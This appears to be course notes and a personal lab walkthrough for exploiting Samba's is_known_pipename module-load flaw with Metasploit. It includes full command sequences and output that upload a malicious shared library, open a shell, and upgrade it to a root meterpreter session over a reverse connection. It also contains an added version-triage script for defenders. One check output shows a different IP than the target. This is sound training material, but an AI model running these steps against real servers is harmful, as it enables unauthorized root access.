Exploiting Samba
SMB (Server Message Block) is a network file sharing protocol that is used to facilitate the sharing of files and peripherals between computers on a local network (LAN).
SMB uses port 445 (TCP). However, originally, SMB ran on top of NetBIOS using port 139.
Samba is the Linux implementation of SMB, and allows Windows systems to access Linux shares and devices.
Samba V3.5.0 is vulnerable to a remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share and then cause the server to load and execute it.
Demo: Exploiting Samba
If you’ve ever worked within a Windows environment, then you should be familiar with SMB. SMB is used to share files or to create shares on a system, and then those shares can be accessed by other Windows systems within that local area network.
During the Windows exploitation section, we explored the process of exploiting SMB on Windows through the EternalBlue exploit or by exploiting the MS17-010 vulnerability.
It’s going to be the same thing here: we are exploiting an inherent vulnerability within Samba. So we’re not looking for a misconfigured Samba server or a misconfigured Samba service running on a target. Instead, we are targeting a vulnerability that, in this case, can be found in Samba version 3.5.0.
A shared library is the Linux equivalent of a DLL file: libraries that are called upon by services or programs. In this case, we connect to Samba on the Linux target and upload a malicious shared library that will consequently provide us with a command shell, and we’ll take a look at how to upgrade that command shell to a meterpreter session. Once the Samba server loads and executes the library, we get access.
It works very similarly to the EternalBlue exploit, in that we are exploiting an inherent vulnerability, not an SMB or Samba misconfiguration.
ifconfig
eth1: inet 192.18.76.2
Start up the PostgreSQL service so that we can interact with the MSF database.
service postgresql start
Launch MSF console.
msfconsole
Create a workspace.
workspace -a samba
Set the global variable for the RHOSTS option. The global variable option will save us from manually or continually entering the target IP whenever we load a new module.
setg RHOSTS 192.18.76.3
Perform an Nmap scan on the target to identify what version of Samba is running on the target. We can do this by utilizing the db_nmap command, which will allow us to perform an Nmap scan from within the MSF console and consequently save the results into the MSF database.
-sS: Perform a SYN scan.
-sV: Perform a service detection scan.
-O: Perform an operating system detection scan.
db_nmap -sS -sV -O 192.18.76.3
Samba is_known_pipename() Arbitrary Module Load
This module triggers an arbitrary shared library load vulnerability in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module requires valid credentials, a writeable folder in an accessible share, and knowledge of the server-side path of the writeable folder. In some cases, anonymous access combined with common filesystem locations can be used to automatically exploit this vulnerability.
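As an added defender-side example (not code from the course or from Metasploit), the following Python turns the module description's version range into a triage check: Nmap's "3.X - 4.X" banner is too coarse to decide, so the script consumes lines in the format of the module's check output, where the exact version and the writeable share appear. It assumes that 4.4.14, 4.5.10 and 4.6.4 are the first patched releases of their branches, and the sample lines are constructed.

```python
"""Triage Samba hosts against the affected range quoted on this page
(3.5.0 up to 4.4.14, 4.5.10, 4.6.4). Added example, not Metasploit's code."""
import re
from typing import List, Optional, Tuple

Version = Tuple[int, int, int]
FIRST_AFFECTED: Version = (3, 5, 0)
# Assumption: the three upper bounds are the first patched release of their
# branches, so those and later point releases are treated as not affected.
FIRST_FIXED = {(4, 4): (4, 4, 14), (4, 5): (4, 5, 10), (4, 6): (4, 6, 4)}
OLDEST_FIXED_BRANCH = (4, 4)
# Shape of the module's check output line.
CHECK_LINE = re.compile(
    r"^\[.\] (?P<host>[\d.]+):(?P<port>\d+) - Samba version (?P<ver>[\d.]+)"
    r" found with writeable share '(?P<share>[^']+)'"
)

def parse_version(text: str) -> Optional[Version]:
    """Parse 'major.minor.patch'; None for banners such as Nmap's '3.X - 4.X'."""
    m = re.match(r"^(\d+)\.(\d+)\.(\d+)$", text.strip())
    return (int(m.group(1)), int(m.group(2)), int(m.group(3))) if m else None

def is_affected(version: str) -> Optional[bool]:
    """True if the version lies in the affected range, None if unparseable."""
    v = parse_version(version)
    if v is None:
        return None
    if v < FIRST_AFFECTED:
        return False
    branch = v[:2]
    if branch in FIRST_FIXED:
        return v < FIRST_FIXED[branch]
    # Branches 3.5 to 4.3 never received the fix; 4.7 and later shipped with it.
    return branch < OLDEST_FIXED_BRANCH

def triage(check_output: str) -> List[Tuple[str, str, str]]:
    """Hosts meeting both preconditions: affected version and a writeable share."""
    hits = []
    for line in check_output.splitlines():
        m = CHECK_LINE.match(line)
        if m and is_affected(m.group("ver")):
            hits.append((m.group("host"), m.group("ver"), m.group("share")))
    return hits

# Constructed sample lines in the check command's format (not the lab's output).
SAMPLE_CHECK_OUTPUT = """\
[+] 192.0.2.10:445 - Samba version 4.1.17 found with writeable share 'exploitable'
[*] 192.0.2.11:445 - Samba version 4.6.4 found with writeable share 'public'
[+] 192.0.2.12:445 - Samba version 4.4.13 found with writeable share 'data'
"""
```

A flagged host meets both preconditions the description names, an affected version and a writeable share; removing either one (updating Samba, or making the share read-only) closes the path this module relies on.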
search type:exploit name:samba
use exploit/linux/samba/is_known_pipename
show options
SMB_FOLDER: The directory to use within the writeable SMB share.
In our case, we haven’t enumerated any information regarding the SMB folders or the share name that contains the writable directory.
Run the check command, which will check if the target is vulnerable.
check
info
run
That executes the exploit and opens a command shell session.
ls
pwd # Print out our current working directory on the Linux target system.
Put this in the background using the keyboard combination Ctrl+z.
List out our sessions. We currently have a command shell session on the target.
sessions
We want to upgrade this to a meterpreter session, because a meterpreter session gives us much better access to the target system.
Search for a post-exploitation module called shell_to_meterpreter.
search shell_to_meterpreter
use post/multi/manage/shell_to_meterpreter
show options
In this case, we need to set the LHOST option, which is the IP address of the host that will receive the connection from the payload, and LPORT, the port the payload connects to. We also need to set the session id, which in this case is 1, because that is the command shell session we want to upgrade.
LHOST: In this case, we can utilize the interface name to set the IP address automatically.
set LHOST eth1
set SESSION 1
run
That’s going to upgrade our command shell session into a meterpreter session.
List out our sessions. We have a meterpreter session on the target system.
sessions 2
The sysinfo command shows what the system is running: the distribution release as well as the kernel version.
getuid: We can check which user we are running as. We have user id 0 (uid=0), which is the root user, so we already have the highest privileges on the Linux target and do not need to escalate them.
meterpreter > sysinfo
meterpreter > getuid
That is how to exploit Samba on Linux.
Vulnerable File Sharing Service
Overview
The target server as described below is running a vulnerable file sharing server. Your task is to fingerprint the application using command line tools available on the Kali terminal and then exploit the application using the appropriate Metasploit module. Get a shell on the target!
Instructions:
- This lab is dedicated to you! No other users are on this network :)
- Once you start the lab, you will have access to a root terminal of a Kali instance
- Your Kali has an interface with IP address 192.X.Y.Z. Run “ip addr” to know the values of X and Y.
- The target server should be located at the IP address 192.X.Y.3.
- Do not attack the gateway located at IP address 192.X.Y.1
- postgresql is not running by default so Metasploit may give you an error about this when starting
Solutions
The solution for this lab can be found in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-178.pdf
My own approach
root@attackdefense:~# ifconfig
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.59.47.2 netmask 255.255.255.0 broadcast 192.59.47.255
ether 02:42:c0:3b:2f:02 txqueuelen 0 (Ethernet)
Target IP Address: 192.59.47.3
root@attackdefense:~# service postgresql start
[ ok ] Starting PostgreSQL 11 database server: main.
root@attackdefense:~# msfconsole -q
msf5 > workspace -a samba
[*] Added workspace: samba
[*] Workspace: samba
msf5 > setg RHOSTS 192.59.47.3
RHOSTS => 192.59.47.3
msf5 > db_nmap -sS -sV -O 192.59.47.3
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2023-02-02 10:56 UTC
[*] Nmap: Nmap scan report for target-1 (192.59.47.3)
[*] Nmap: Host is up (0.000049s latency).
[*] Nmap: Not shown: 998 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: MAC Address: 02:42:C0:3B:2F:03 (Unknown)
[*] Nmap: No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
[*] Nmap: TCP/IP fingerprint:
[*] Nmap: OS:SCAN(V=7.70%E=4%D=2/2%OT=139%CT=1%CU=32774%PV=N%DS=1%DC=D%G=Y%M=0242C0%T
[*] Nmap: OS:M=63DB96DE%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10D%TI=Z%CI=Z%II=I
[*] Nmap: OS:%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O
[*] Nmap: OS:5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6
[*] Nmap: OS:=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
[*] Nmap: OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
[*] Nmap: OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
[*] Nmap: OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
[*] Nmap: OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
[*] Nmap: OS:N%T=40%CD=S)
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: Host: VICTIM-1
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 23.15 seconds
msf5 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.59.47.3 139 tcp netbios-ssn open Samba smbd 3.X - 4.X workgroup: WORKGROUP
192.59.47.3 445 tcp netbios-ssn open Samba smbd 3.X - 4.X workgroup: WORKGROUP
msf5 > search type:exploit name:samba
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 exploit/freebsd/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (*BSD x86)
2 exploit/linux/samba/chain_reply 2010-06-16 good No Samba chain_reply Memory Corruption (Linux x86)
3 exploit/linux/samba/is_known_pipename 2017-03-24 excellent Yes Samba is_known_pipename() Arbitrary Module Load
4 exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Yes Samba lsa_io_trans_names Heap Overflow
5 exploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Yes Samba SetInformationPolicy AuditEventsInfo Heap Overflow
6 exploit/linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86)
7 exploit/multi/samba/nttrans 2003-04-07 average No Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
8 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
9 exploit/osx/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
10 exploit/osx/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Mac OS X PPC)
11 exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
12 exploit/solaris/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Solaris SPARC)
13 exploit/windows/http/sambar6_search_results 2003-06-21 normal Yes Sambar 6 Search Results Buffer Overflow
msf5 > use exploit/linux/samba/is_known_pipename
msf5 exploit(linux/samba/is_known_pipename) > show options
Module options (exploit/linux/samba/is_known_pipename):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.59.47.3 yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SMB_FOLDER no The directory to use within the writeable SMB share
SMB_SHARE_NAME no The name of the SMB share containing a writeable directory
Exploit target:
Id Name
-- ----
0 Automatic (Interact)
msf5 exploit(linux/samba/is_known_pipename) > check
[+] 192.89.91.3:445 - Samba version 4.1.17 found with writeable share 'exploitable'
[*] 192.89.91.3:445 - The target appears to be vulnerable.
msf5 exploit(linux/samba/is_known_pipename) > info
msf5 exploit(linux/samba/is_known_pipename) > run
[*] 192.59.47.3:445 - Using location \\192.59.47.3\exploitable\tmp for the path
[*] 192.59.47.3:445 - Retrieving the remote path of the share 'exploitable'
[*] 192.59.47.3:445 - Share 'exploitable' has server-side path '/
[*] 192.59.47.3:445 - Uploaded payload to \\192.59.47.3\exploitable\tmp\QXzAIroD.so
[*] 192.59.47.3:445 - Loading the payload from server-side path /tmp/QXzAIroD.so using \\PIPE\/tmp/QXzAIroD.so...
[-] 192.59.47.3:445 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.59.47.3:445 - Loading the payload from server-side path /tmp/QXzAIroD.so using /tmp/QXzAIroD.so...
[+] 192.59.47.3:445 - Probe response indicates the interactive payload was loaded...
[*] Found shell.
[*] Command shell session 1 opened (192.59.47.2:40283 -> 192.59.47.3:445) at 2023-02-02 11:06:45 +0000
ls
pwd
/tmp
^Z
Background session 1? [y/N] y
msf5 exploit(linux/samba/is_known_pipename) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 192.59.47.2:40283 -> 192.59.47.3:445 (192.59.47.3)
msf5 exploit(linux/samba/is_known_pipename) > search shell_to_meterpreter
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 post/multi/manage/shell_to_meterpreter normal No Shell to Meterpreter Upgrade
msf5 exploit(linux/samba/is_known_pipename) > use post/multi/manage/shell_to_meterpreter
msf5 post(multi/manage/shell_to_meterpreter) > show options
Module options (post/multi/manage/shell_to_meterpreter):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER true yes Start an exploit/multi/handler to receive the connection
LHOST no IP of host that will receive the connection from the payload (Will try to auto detect).
LPORT 4433 yes Port for payload to connect to.
SESSION yes The session to run this module on.
msf5 post(multi/manage/shell_to_meterpreter) > set LHOST eth1
LHOST => 192.59.47.2
msf5 post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1
msf5 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.59.47.2:4433
[*] Sending stage (985320 bytes) to 192.59.47.3
[*] Meterpreter session 2 opened (192.59.47.2:4433 -> 192.59.47.3:59248) at 2023-02-02 11:16:12 +0000
[*] Command stager progress: 100.00% (773/773 bytes)
[*] Post module execution completed
msf5 post(multi/manage/shell_to_meterpreter) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 192.59.47.2:40283 -> 192.59.47.3:445 (192.59.47.3)
2 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0 @ 192.59.47.3 192.59.47.2:4433 -> 192.59.47.3:59248 (192.59.47.3)
msf5 post(multi/manage/shell_to_meterpreter) > sessions 2
[*] Starting interaction with 2...
meterpreter > sysinfo
Computer : 192.59.47.3
OS : Debian 8.11 (Linux 5.4.0-125-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >